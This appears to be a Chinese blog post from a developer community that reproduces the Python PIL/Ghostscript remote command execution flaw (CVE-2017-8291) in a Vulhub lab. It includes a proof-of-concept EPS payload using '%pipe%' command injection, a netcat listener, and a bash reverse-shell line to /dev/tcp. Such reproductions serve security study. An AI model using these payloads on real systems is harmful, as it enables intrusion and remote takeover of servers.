AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

Python PIL远程命令执行漏洞复现(CVE-2017-8291 CVE-2017-8291)

2023-08-08 727
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: Python PIL远程命令执行漏洞复现(CVE-2017-8291 CVE-2017-8291)

漏洞原理

Python中处理图片的模块PIL(Pillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞。

漏洞详情

漏洞简述

PIL内部根据图片头(Magic Bytes)判断图片类型,如果发现是一个eps文件(头为%!PS),则分发给PIL/EpsImagePlugin.py处理。
在这个模块中,PIL调用了系统的gs命令,也就是GhostScript来处理图片文件:

command = ["gs",
            "-q",                         # quiet mode
            "-g%dx%d" % size,             # set output geometry (pixels)
            "-r%fx%f" % res,              # set input DPI (dots per inch)
            "-dBATCH",                    # exit after processing
            "-dNOPAUSE",                  # don't pause between pages,
            "-dSAFER",                    # safe mode
            "-sDEVICE=ppmraw",            # ppm driver
            "-sOutputFile=%s" % outfile,  # output file
            "-c", "%d %d translate" % (-bbox[0], -bbox[1]),
                                            # adjust for image origin
            "-f", infile,                 # input file
            ]

# 省略判断是GhostScript是否安装的代码
try:
    with open(os.devnull, 'w+b') as devnull:
        subprocess.check_call(command, stdin=devnull, stdout=devnull)
    im = Image.open(outfile)

漏洞复现环境

名称 系统名称 IP地址
攻击机 kali 192.168.255.57
靶机 centos7 192.168.255.176

1、在centos7中开启docker环境,并拉取Vulhub漏洞源码

[root@didiplus ~]# git clone https://github.com/vulhub/vulhub.git

2、进入CVE-2017-8291

[root@didiplus CTF]# cd vulhub/python/PIL-CVE-2017-8291/
[root@didiplus PIL-CVE-2017-8291]# ls
01.png  app.py  docker-compose.yml  poc.png  README.md
[root@didiplus PIL-CVE-2017-8291]#

3、执行命令docker-compose up -d,拉取镜像。

[root@didiplus PIL-CVE-2017-8291]# docker-compose up -d
Creating pil-cve-2017-8291_web_1 ... done
[root@didiplus PIL-CVE-2017-8291]# docker ps -a
CONTAINER ID        IMAGE                                COMMAND                  CREATED             STATUS              PORTS                               NAMES
80c159201cad        vulhub/ghostscript:9.21-with-flask   "python app.py"          6 seconds ago       Up 3 seconds        0.0.0.0:8000->8000/tcp              pil-cve-2017-8291_web_1

4、在kali下访问靶场:http://192.168.255.167:8000/
在这里插入图片描述5、上传poc.png图片,使用vi打开该文件,内容如下:

...省略...
currentdevice null false mark /OutputFile (%pipe%touch /tmp/aaaaa)
.putdeviceparams
1 true .outputpage
.rsdparams
%{
   
    } loop
0 0 .quit
%asdf

在这里插入图片描述

上传文件成功后,会在/tmp/目录下创建aaaaa文件。

6、在docker靶场中查看aaaaa文件,证明是否存在漏洞
在这里插入图片描述
成功在tmp目录下创建文件,说明存在漏洞。

通过反弹shell命令获取root权限。

1、在kail(攻击机)上,开启侦听端口8002端口,执行 nc -l -p 8002
在这里插入图片描述
2、修改poc.png的命令为反弹shell命令bash –c "bash –i >& /dev/tcp/192.168.32.1/777 0>&1"
在这里插入图片描述3、再次上传后,监听端口成功反弹shell
在这里插入图片描述
参考资料:
Python PIL 远程命令执行漏洞(GhostButt CVE-2017-8291 )
Python PIL 远程命令执行漏洞(GhostButt )

文章标签:
Python
Shell
容器
Linux
网络协议
Docker
安全
关键词:
Python命令
Python pil
Python复现
didiplus
目录
相关文章
荔枝科研社
|
26天前
|
机器学习/深度学习 算法 调度
【EI复现】基于深度强化学习的微能源网能量管理与优化策略研究(Python代码实现)
【EI复现】基于深度强化学习的微能源网能量管理与优化策略研究(Python代码实现)
荔枝科研社
93 0
Deephub
|
3月前
|
数据采集 机器学习/深度学习 编解码
从零复现Google Veo 3:从数据预处理到视频生成的完整Python代码实现指南
本文详细介绍了一个简化版 Veo 3 文本到视频生成模型的构建过程。首先进行了数据预处理,涵盖了去重、不安全内容过滤、质量合规性检查以及数据标注等环节。
Deephub
242 5
从零复现Google Veo 3:从数据预处理到视频生成的完整Python代码实现指南
bruce_xiaowei
|
8月前
|
机器学习/深度学习 存储 数据挖掘
Python图像处理实用指南:PIL库的多样化应用
本文介绍Python中PIL库在图像处理中的多样化应用,涵盖裁剪、调整大小、旋转、模糊、锐化、亮度和对比度调整、翻转、压缩及添加滤镜等操作。通过具体代码示例,展示如何轻松实现这些功能,帮助读者掌握高效图像处理技术,适用于图片美化、数据分析及机器学习等领域。
bruce_xiaowei
318 20
wljslmz
|
11月前
|
安全 网络安全 文件存储
思科设备巡检命令Python脚本大集合
【10月更文挑战第18天】
wljslmz
344 1
思科设备巡检命令Python脚本大集合
蓝易云
|
8月前
|
运维 Shell 数据库
Python执行Shell命令并获取结果:深入解析与实战
通过以上内容,开发者可以在实际项目中灵活应用Python执行Shell命令,实现各种自动化任务,提高开发和运维效率。
蓝易云
230 20
pai_rec_coder
|
9月前
|
分布式计算 MaxCompute 对象存储
EasyRec用于特征选择的命令和参数解释 easy_rec/python/tools/feature_selection.py
EasyRec用于特征选择的命令和参数解释
pai_rec_coder
179 16
蓝易云
|
8月前
|
安全 Shell 数据处理
使用Python执行Shell命令并获取结果
在实际应用中,可以根据需要选择适当的参数和方法来执行Shell命令,并处理可能出现的各种情况。无论是系统管理、自动化任务还是数据处理,掌握这些技巧都将极大地提高工作效率。
蓝易云
278 12
摩诃般若
|
11月前
|
Python
Python PDB命令介绍
【10月更文挑战第15天】 使用PDB的方式有两种,其中一种是在脚本中添加代码,不觉得这种方式比print好在哪里,所以这种方式此文不表。这里我们只学习PDB的命令行使用方式
摩诃般若
266 4
java冯坚持
|
11月前
|
机器学习/深度学习 缓存 PyTorch
pytorch学习一(扩展篇):miniconda下载、安装、配置环境变量。miniconda创建多版本python环境。整理常用命令(亲测ok)
这篇文章是关于如何下载、安装和配置Miniconda,以及如何使用Miniconda创建和管理Python环境的详细指南。
java冯坚持
3571 0
pytorch学习一(扩展篇):miniconda下载、安装、配置环境变量。miniconda创建多版本python环境。整理常用命令(亲测ok)
游客j4mujezz7vm7y
|
12月前
|
机器学习/深度学习 Shell 开发工具
Python使用管道执行git命令报错|4-7
Python使用管道执行git命令报错|4-7
游客j4mujezz7vm7y
202 2

热门文章

最新文章

  • 1
    Python 函数式编程:让代码更简洁高效
  • 2
    Python构建MCP服务器:从工具封装到AI集成的全流程实践
  • 3
    深度分析大麦网API接口,用Python脚本实现
  • 4
    Python中的异步编程:asyncio入门指南
  • 5
    requirement.txt 管理python包依赖
  • 6
    Python中的f-string:更简洁的字符串格式化
  • 7
    Python 函数式编程的执行效率:实际应用中的权衡
  • 8
    Python量化交易:结合爬虫与TA-Lib技术指标分析
  • 9
    Python中的f-string:更简洁的字符串格式化
  • 10
    Python变量与基础数据类型:整型、浮点型和字符串操作全解析
  • 1
    Python广阔的应用前景
    125
  • 2
    图像自动化保存工具:Python脚本开发指南
    307
  • 3
    【优秀python案例】基于百度贴吧的数据采集与文本分析设计与实现
    607
  • 4
    如何可视化神经网络的神经元节点之间的连接?附有Python预处理代码
    207
  • 5
    【优秀python案例】基于python因子分析关于城市发展差异分析中的应用与实现
    349
  • 6
    【2024泰迪杯】B 题:基于多模态特征融合的图像文本检索Python代码baseline
    194
  • 7
    【2024泰迪杯】C 题:竞赛论文的辅助自动评阅 问题分析及Python 代码实现
    253
  • 8
    【优秀python毕设案例】基于python django的新媒体网络舆情数据爬取与分析
    906
  • 9
    【2024泰迪杯】B 题:基于多模态特征融合的图像文本检索Python代码实现
    188
  • 10
    【2024泰迪杯】A 题:生产线的故障自动识别与人员配置 Python代码实现
    245

    • 相关课程

    更多
  • Python Web开发基础
  • Python爬虫实战
  • Python常用数据科学库
  • Python网络爬虫实战
  • Python完全自学手册图文教程
  • Python基础快速入门实战教程

    • 相关电子书

    更多
  • From Python Scikit-Learn to Sc
  • Data Pre-Processing in Python:
  • 双剑合璧-Python和大数据计算平台的结合

    • 推荐镜像

    更多
  • python-release
    • 下一篇
    蛋白质语言模型 ProGen:在实验室合成由 AI 预测的蛋白质